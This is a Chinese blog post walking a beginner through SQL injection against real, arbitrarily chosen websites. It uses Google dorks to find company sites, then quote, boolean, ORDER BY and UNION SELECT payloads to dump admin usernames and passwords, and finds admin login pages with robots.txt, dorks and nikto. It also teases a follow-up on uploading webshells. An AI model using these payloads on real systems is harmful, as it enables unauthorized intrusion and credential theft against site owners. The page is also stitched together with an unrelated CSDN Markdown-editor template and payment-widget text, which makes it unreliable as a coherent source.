第一次SQL注入渗透实战

最近在学习python的爬虫脚本,爬取了各个网站的数据。突然间心血来潮,想学习如何来渗透进目标网站。 看了网上的部分视频和文章, 大部分都是在讲解如何使用Kali Linux 下的工具进行渗透, 却很少有入门级的详细实战教程。 于是我想写下这篇文章来记录作为一个渗透初学者的一些思路及步骤。 有不对或者可以改进的地方,欢迎探讨指教。基本思路:1. 寻找一个入门级的渗透目标2. 快速判别SQL的注入点3. 获取后台账号密码4. 查找后台登陆口详细步骤1. 寻找一个入门级的渗透目标作为一个渗透的初学者, 遇到的第一个门槛就是如何寻找一个入门级的渗透目标。 我浏览的网上的很多教程或者是笔记, 大部分都是在描述如何渗透一个给定目标。 然而不同的渗透目标,有着不同的渗透方法。对于初学者来说,如若按照教程上的描述去套用目前主流网站,无异于盲人摸象,根本无从入手。相信大部分初学者, 都处于一种教程大致能看懂,却无法渗透成功任何一个网站的状态。SQL注入是经典的渗透方法,非常适合入门者的练习。 推荐大家看看知乎的这篇教程你真的会SQL注入吗? 目前我知道的寻找渗透目标的方法有两种:1. Kali linux 下的w3af 工具。 给定一个目标网址,能够很快扫描出可能存在的漏洞。2. (初学者推荐)Google Hack。 能够快速过滤到php/asp 网站中 的SQL注入点下面将描述我使用 Google 高级搜索的实例:1. 打开Google搜索 (国内的朋友需要挂vpn)2. 在输入框中输入  公司 inurl:php?ID=    这句话的意思是查找所有可能存在SQL注入点的公司url2. 快速判别SQL的注入点在第一步当中,我们已经得到了Google的搜索结果,那么接下来我们就要寻找一个入门级的SQL渗透目标了。1. 打开Google 搜索结果当中的任意url, 在url后面加 ‘  这一步是为了判别这个url是否是可用的SQL注入点。 如果页面显示的是SQL的错误信息, 那么恭喜你,你找到了SQL的注入点。反之,证明不可用。例子如下:原网址: www.example.com/book.php?ID=5新网址:www.example.com/book.php?ID=5’浏览器显示如下:Database error:Invalid SQL: select * from sy_page where 1 and ID=3’MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 1)Session halted.2.继续验证是否为有效SQL注入点, 我们选择采用经典的 and 1=1 和 and 1=2 来进一步验证(假定为数字型注入)。当然还有其它验证方法,我以最简单的为例。原URL:www.example.com/book.php?ID=5新URL: www.example.com/book.php?ID=5 and 1=1结果应该返回正常页面, 原理是 1=1 的值永远为true.原URL:www.example.com/book.php?ID=5新URL: www.example.com/book.php?ID=5 and 1=2结果应该返回错误页面或者空, 原理是 1=2 的值永远为false.3.目前来说,大部分网址都会对SQL注入采取一定的防范措施,如对url输入进行验证或者安装WAF来拦截请求(主流)。绕过WAF的方式有很多种,作为初学者来说,这里不做讨论, 可以自行Google或者跳过该网站。3. 获取后台账户密码在上一步得到可用的SQL注入点之后,现在我们可以开始来获取后台的帐号密码了。Kali Linux 下的sqlmap 是很好用的工具,网上有很多教程。我这里主要想说下如何不依赖sqlmap, 而是采用手动注入的方法来获取后台数据。方便理解SQL注入的基本原理。这里推荐大家安装 Firefox 的hack bar 插件。这里我们利用SQL的UNION运算符来获取数据库的值 UNION的用法简单来说UNION就是将两次select 的结果合并起来。需要注意的是, UNION两侧的列数和类型必须相等。1. 猜测列数由于需要使用UNION操作,我们必须先得到UNION左边的列数,这里我才用ORDER BY。 举个栗子:猜测列数 <=3, 若返回正常页面,则表示猜测正确,反之错误。可以多次尝试直到找到最大值。原URL:www.example.com/book.php?ID=5新URL: www.example.com/book.php?ID=5 ORDER BY 32.查看column在页面中的位置当我们得到列数之后, 我们需要知道哪些列在当前页面中的位置, 因为并不是所有的列都会在页面中显示。假定最大列数为4, 步骤如下:将ID替换为-1, 这样保证UNION左边的结果为空,添加 UNION SELECT 1,2,3,4 。原URL:www.example.com/book.php?ID=5新URL: www.example.com/book.php?ID=-1 UNION SELECT 1,2,3,4然后在页面当中, 我们不一定能看到全部的 1,2,3,4.  我们选择能看见的数字,作为之后的输出点,假定我们在页面中能看数字2.TODO 添加图片3. 得到数据库名为了了解爆出数据库的原理,我们需要了解下 sql 中的 database: information_schema.简单来说,在information_schema中存储了所有的数据库信息,表名,字段名等等。原URL:www.example.com/book.php?ID=5新URL: www.example.com/book.php?ID=-1 UNION SELECT 1, database(), 3, 4在原本数字2 的位置,显示的即为当前数据库名。4. 得到表名原URL:www.example.com/book.php?ID=5新URL: www.example.com/book.php?ID=-1 UNION SELECT 1, group_concat(table_name), 3, 4 from information_schema.tables where table_schema=database()在原数字2的位置,即可得到数据下的所有表5. 得到表中的字段名假定上一步得到的表为admin原URL:www.example.com/book.php?ID=5新URL: www.example.com/book.php?ID=-1 UNION SELECT 1, group_concat(column_name), 3, 4 from information_schema.columns where table_name=“admin”结果为目标表下的所有字段名。6. 得到后台账号密码这一步我们就能得到我们所需要的账号密码了,想想还有点小激动呢。假定上一步得到的字段名中有 username 和 password 等。原URL:www.example.com/book.php?ID=5新URL: www.example.com/book.php?ID=-1 UNION SELECT 1, group_concat(username, password), 3, 4 from admin在原本数字2的位置显示的即为账号密码了。4. 查找后台登录口到了这一步,离进入后台就只有一步之遥了。但所谓行百里者半九十,找不到后台登录口的话,前面的工作就白白浪费了。我所知道的查找后台登录口的方法有以下三种1. 通过robots.txt来寻找2. 通过Google Hack来搜索3. 通过Kali Linux下的Nikto 工具来扫描先说说第一种方法,一般主流网站为了防爬虫一般都会写robots协议。 协议的存放位置在”http://www.example.com/robots.txt“.  我们在浏览器当中直接输入url地址,查看协议内容。 运气好的话能够找到后台的URL。 有趣的是, 因为Google 爬虫遵循robots协议,如若后台地址在robots.txt当中的话, 使用Google Hack(第二种方法)是找不到后台url的。接着说说第二种方法,Google Hack在Google搜索中输入:  site:example.com inurl:login|admin|manage|manager|admin_login|login_admin|systemsite:example.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|systemsite:example.com inurl:login|admin|manage|manager|admin_login|login_admin|systemsite:example.com intitle:管理|后台|登陆|site:example.com intext:验证码第三种就是使用 Kali Linux 中的nikto了,当然还有很多其它的工具。 这里就不列举了。工具的使用教程很多,我就不赘叙了。这一篇就写到这吧。 作为第一次SQL注入实战,还有很多细节没有补充。我不打算贴实际的网站截图了(怕被查水表),不过会把搭建的DVWA靶机的截图补上。下一篇想写写进入后台之后,如何得到shell的实例。主要写下如何利用上传绕过,将木马打入服务器中,然后使用中国菜刀连接。

作者:梅子酒QAQ
链接:https://www.jianshu.com/p/a73276cd4a04
来源:简书
简书著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。@TOC

欢迎使用Markdown编辑器

你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。

新的改变

我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客:

  1. 全新的界面设计 ,将会带来全新的写作体验;
  2. 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示;
  3. 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示;
  4. 全新的 KaTeX数学公式 语法;
  5. 增加了支持甘特图的mermaid语法1 功能;
  6. 增加了 多屏幕编辑 Markdown文章功能;
  7. 增加了 焦点写作模式、预览模式、简洁写作模式、左右区域同步滚轮设置 等功能,功能按钮位于编辑区域与预览区域中间;
  8. 增加了 检查列表 功能。

功能快捷键

撤销:Ctrl/Command + Z
重做:Ctrl/Command + Y
加粗:Ctrl/Command + B
斜体:Ctrl/Command + I
标题:Ctrl/Command + Shift + H
无序列表:Ctrl/Command + Shift + U
有序列表:Ctrl/Command + Shift + O
检查列表:Ctrl/Command + Shift + C
插入代码:Ctrl/Command + Shift + K
插入链接:Ctrl/Command + Shift + L
插入图片:Ctrl/Command + Shift + G

合理的创建标题,有助于目录的生成

直接输入1次#,并按下space后,将生成1级标题。
输入2次#,并按下space后,将生成2级标题。
以此类推,我们支持6级标题。有助于使用TOC语法后生成一个完美的目录。

如何改变文本的样式

强调文本 强调文本

加粗文本 加粗文本

标记文本

删除文本

引用文本

H2O is是液体。

210 运算结果是 1024.

插入链接与图片

链接: link.

图片: Alt

带尺寸的图片: Alt

居中的图片: Alt

居中并且带尺寸的图片: Alt

当然,我们为了让用户更加便捷,我们增加了图片拖拽功能。

如何插入一段漂亮的代码片

博客设置页面,选择一款你喜欢的代码片高亮样式,下面展示同样高亮的 代码片.

// An highlighted block
var foo = 'bar';

生成一个适合你的列表

  • 项目
    • 项目
      • 项目
  1. 项目1
  2. 项目2
  3. 项目3
  • 计划任务
  • 完成任务

创建一个表格

一个简单的表格是这么创建的:

项目Value
电脑$1600
手机$12
导管$1

设定内容居中、居左、居右

使用:---------:居中
使用:----------居左
使用----------:居右

第一列第二列第三列
第一列文本居中第二列文本居右第三列文本居左

SmartyPants

SmartyPants将ASCII标点字符转换为“智能”印刷标点HTML实体。例如:

TYPEASCIIHTML
Single backticks'Isn't this fun?'‘Isn’t this fun?’
Quotes"Isn't this fun?"“Isn’t this fun?”
Dashes-- is en-dash, --- is em-dash– is en-dash, — is em-dash

创建一个自定义列表

Markdown
Text-to- HTML conversion tool
Authors
John
Luke

如何创建一个注脚

一个具有注脚的文本。2

注释也是必不可少的

Markdown将文本转换为 HTML

KaTeX数学公式

您可以使用渲染LaTeX数学表达式 KaTeX:

Gamma公式展示 Γ ( n ) = ( n − 1 ) ! ∀ n ∈ N \Gamma(n) = (n-1)!\quad\forall n\in\mathbb N Γ(n)=(n1)!nN 是通过欧拉积分

Γ ( z ) = ∫ 0 ∞ t z − 1 e − t d t &ThinSpace; . \Gamma(z) = \int_0^\infty t^{z-1}e^{-t}dt\,. Γ(z)=0tz1etdt.

你可以找到更多关于的信息 LaTeX 数学表达式here.

新的甘特图功能,丰富你的文章

Mon 06 Mon 13 Mon 20 已完成 进行中 计划一 计划二 现有任务 Adding GANTT diagram functionality to mermaid
  • 关于 甘特图 语法,参考 这儿,

UML 图表

可以使用UML图表进行渲染。 Mermaid. 例如下面产生的一个序列图::

张三 李四 王五 你好!李四, 最近怎么样? 你最近怎么样,王五? 我很好,谢谢! 我很好,谢谢! 李四想了很长时间, 文字太长了 不适合放在一行. 打量着王五... 很好... 王五, 你怎么样? 张三 李四 王五

这将产生一个流程图。:

链接
长方形
圆角长方形
菱形
  • 关于 Mermaid 语法,参考 这儿,

FLowchart流程图

我们依旧会支持flowchart的流程图:

Created with Raphaël 2.2.0 开始 我的操作 确认? 结束 yes no
  • 关于 Flowchart流程图 语法,参考 这儿.

导出与导入

导出

如果你想尝试使用此编辑器, 你可以在此篇文章任意编辑。当你完成了一篇文章的写作, 在上方工具栏找到 文章导出 ,生成一个.md文件或者.html文件进行本地保存。

导入

如果你想加载一篇你写过的.md文件或者.html文件,在上方工具栏可以选择导入功能进行对应扩展名的文件导入,
继续你的创作。


  1. mermaid语法说明 ↩︎

  2. 注脚的解释 ↩︎

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值